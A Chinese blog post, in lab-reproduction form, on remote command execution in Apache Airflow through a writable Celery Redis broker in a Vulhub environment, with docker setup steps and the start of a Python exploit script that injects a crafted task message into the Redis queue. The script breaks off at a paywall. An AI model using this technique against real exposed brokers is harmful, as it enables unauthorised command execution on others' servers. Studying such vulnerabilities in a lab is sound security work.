Apache Airflow Celery Broker 远程命令执行

已于 2024-02-21 17:07:39 修改
阅读量239 收藏
点赞数 3
CC 4.0 BY-SA版权
分类专栏: apache漏洞 文章标签: apache
于 2024-02-21 17:00:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_53639243/article/details/136214172
文章描述了一种攻击方法,通过获取Celery代理Redis的写入权限,在Vulhub环境中,黑客可以将恶意任务添加到队列中,进而执行任意命令,如使用exploit_airflow_celery.py脚本touch/tmp/airflow_celery_success。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 docker 启动环境

#Initialize the database
docker-compose run airflow-init

#Start service
docker-compose up -d

要利用此漏洞,您必须获得 Celery 代理 Redis 的写入权限。在Vulhub环境中,Redis端口6379暴露在Internet上。

通过 Redis,您可以将邪恶任务 airflow.executors.celery_executor.execute_command 添加到队列中以执行任意命令。

使用此脚本exploit_airflow_celery.py执行命令 touch /tmp/airflow_celery_success

import pickle
import json
import base64
import redis
import sys
r = redis.Redis(host=sys.argv[1], port=6379, decode_responses=True,db=0) 
queue_name = 'default'
ori_str="{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-
最低0.47元/天 解锁文章

200万优质内容无限畅学
构建强大的分布式调度集群:AirflowCelery和MySQL
LpmShell的博客
09-24 317
Apache AirflowAirflow是一个开源的任务调度和工作流管理平台。它允许用户定义、调度和监控复杂的工作流任务。Airflow提供了丰富的任务调度功能,包括依赖关系管理、任务重试、任务超时处理等。CeleryCelery是一个分布式任务队列系统,用于处理大规模的异步任务。它提供了可扩展的架构,可以将任务分发到多个工作节点上并行执行。Celery支持多种消息代理,如RabbitMQ和Redis,用于在任务之间进行通信。MySQL:MySQL是一个流行的开源关系型数据库管理系统。
Apache Airflow Celery 消息中间件命令执行漏洞复现(CVE-2020-11981)
Tauil的博客
08-14 1942
利用AirflowCeleryExecutor类来进行命令执行,可利用版本小于1.10.10。到airflowcelery redis队列。写入一个JSON任务消息执行。然后另起一个终端,输入。,回到原终端执行命令。,即可连接到目标靶机。...
vulhub中 Apache Airflow Celery 消息中间件命令执行漏洞复现(CVE-2020-11981)
最新发布
yougexiaojiuguan的博客
02-03 425
漏洞复现过程中的记录,方便自己以后查看。
Apache Airflow Celery 消息中间件命令执行(CVE-2020-11981)
weixin_44047654的博客
11-28 1552
Apache Airflow Celery 消息中间件命令执行(CVE-2020-11981)
[2021-09-08]使用docker安装airflow后,在容器内执行宿主机或远程服务器上的作业
枪枪枪的博客
09-08 587
确保在容器中可以通过ssh连接宿主机或远程服务器(一般是ok的,ssh在容器中也配置的有)在dag中使用SSHOperator创建job。ssh_conn_id创建方式。
celery最佳实践
weixin_33701294的博客
06-25 505
作为一个Celery使用重度用户,看到Celery Best Practices这篇文章,不由得菊花一紧。干脆翻译出来,同时也会加入我们项目中celery的实战经验。至于Celery为何物,看这里Celery。通常在使用Django的时候,你可能需要执行一些长时间的后台任务,没准你可能需要使用一些能排序的任务队列,那么Celery将会是一个非常好的选择。当把Celery作为一个任务队列用于很多...
Apache Airflow 2.5.1 最新(celery集群方式)安装
weixin_44824330的博客
03-03 691
最新版本 2.5.1( Apache Airflow celery集群安装) 教程
Airflow 配置celery+rabbitmq和celery+redis
努力的凹凸曼的博客
09-20 2055
Airflow 配置celery+rabbitmq 1、安装celery和rabbitmq组件 pip3 install apache-airflow[celery] pip3 install apache-airflow[rabbitmq] 2、系统安装rabbit 1)安装 erlang yum install -y erlang 如果报错如下: [**** ]#...
Airflow+celery集群部署、踩坑
Im ok的博客哦
12-07 5529
Airflow安装部署
Airflow2.2.3 + Celery + MYSQL 8构建一个健壮的分布式调度集群
Marionxue
01-05 3378
云原生生态圈 · 往期推荐云原生生态圈之玩转容器系列文章云原生生态圈之运维架构专辑文章云原生生态圈之DevOps理论与实践系列文章云原生生态圈之Kubernetes理论与实践系列文章云原生...
airflow源码精读 七
u013010890的博客
03-11 391
执行命令 airflow worker,所谓 Worker 其实是 Celery 的工作进程,一个 Worker 根据 concurrency 启动若干个守护进程,用于任务的并发执行。CeleryExecutor用于远程执行任务,多进程模式,可分布在不同服务器间,通过共同连通的队列(redis,mq消息队列),实现分布式的生产者消费者模式,CeleryExecutor接到任务提交到分布式celery任务队列中,celery的woker消费指定队列的任务,执行其命令。正在执行的任务(self.runing)
Apache Airflow2.2.4
一名假的程序猿
11-22 673
airflow
Linux Workflow Airflow CeleryExecutor 踩坑心酸历程
迷恋晓峰
05-10 9635
本篇所使用的系统环境为 Centos 6.8,Python 3.6.5,Airflow 1.9.0 Airflow 的搭建可以参考从0到1,AirFlow搭建踩坑历程 安装RabbitMQ 1.安装erlang erlang地址:http://www.rabbitmq.com/releases/erlang/ 使用 rpm -ihv 安装 ...
airflow常见问题汇总
Gzigithub的博客
01-03 9703
AirFlow常见问题汇总 airflow常见问题的排查记录如下: 1,airflow怎么批量unpause大量的dag任务 ​ 普通少量任务可以通过命令airflow unpause dag_id命令来启动,或者在web界面点击启动按钮实现,但是当任务过多的时候,一个个任务去启动就比较麻烦。其实dag信息是存储在数据库中的,可以通过批量修改数据库信息来达到批量启动dag任务的效果。假如是用...
如何部署一个健壮的 apache-airflow 调度系统
热门推荐
somezz的专栏
09-17 1万+
之前介绍过的 apache-airflow 系列文章 任务调度神器 airflow 之初体验 airflow 安装,部署,填坑 airflow 配置 CeleryExecutor 介绍了如何安装、配置、及使用,接下来介绍如何在跨多个节点来安装部署 apache-airflow: 本文主要介绍以下几点: airflow 的守护进程 airflow 单节点部署 airflow 多节点(集群)部署 ...
Airflow CeleryExecutor安装和配置说明
走过路过
02-21 1万+
Airflow这个神器似乎在国内用的并不算多,所以很多文档都不是很全。Celery也是个神器。本文主要记录Airflow如何将Executor切换成CeleryExecutor——只有切换成CeleryExecutor,才能实现sub节点的单节点重跑,否则整个sub节点都需要重跑。配置的坑比较多,也修改了源码,特此记录说明。 1. 安装RabbitMQRabbitMQ是Celery官方推荐的生产级B
通过AirFlow远程调度TensorFlow机器学习程序
genwise的专栏
08-19 2438
通过AirFlow远程调度TensorFlow机器学习程序 TensorFlow机器学习程序运行时间比较长,因此调度TensorFlow机器学习程序需要考虑采用异步而不是同步调用的方式。我们开发的机器学习应用框架Prism中,我们通过浏览器端调用AirFlowAirFlow调用TensorFlow机器学习程序的方法,实现了远程调用TensorFlow机器学习程序。TensorFlow机器学习...
airflow-CeleryExecutor
tinahanfangyan的博客
07-19 447
安装celery #Celery文档 http://docs.jinkan.org/docs/celery/index.html #Celery4.0.0在airflow中有一些问题,所以安装Celery3 pip install -U Celery==3.1.24 pip install airflow[celery] 安装rabbitmq apt-get install rabbit...
airflow实战系列】 基于 python 的调度和监控工作流的平台
Qcloud_KID的博客
05-01 6591
简介 airflow 是一个使用python语言编写的data pipeline调度和监控工作流的平台。Airflow被Airbnb内部用来创建、监控和调整数据管道。任何工作流都可以在这个使用Python来编写的平台上运行。 Airflow是一种允许工作流开发人员轻松创建、维护和周期性地调度运行工作流(即有向无环图或成为DAGs)的工具。在Airbnb中,这些工作流包括了如数据存储、增
airflow分布式安装教程
03-31
要在工作节点上启动Celery worker,请运行以下命令: ``` airflow celery worker ``` 9. 启动Celery beat 要在管理节点上启动Celery beat,请运行以下命令: ``` airflow celery beat ``` 10. 使用Airflow 现在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值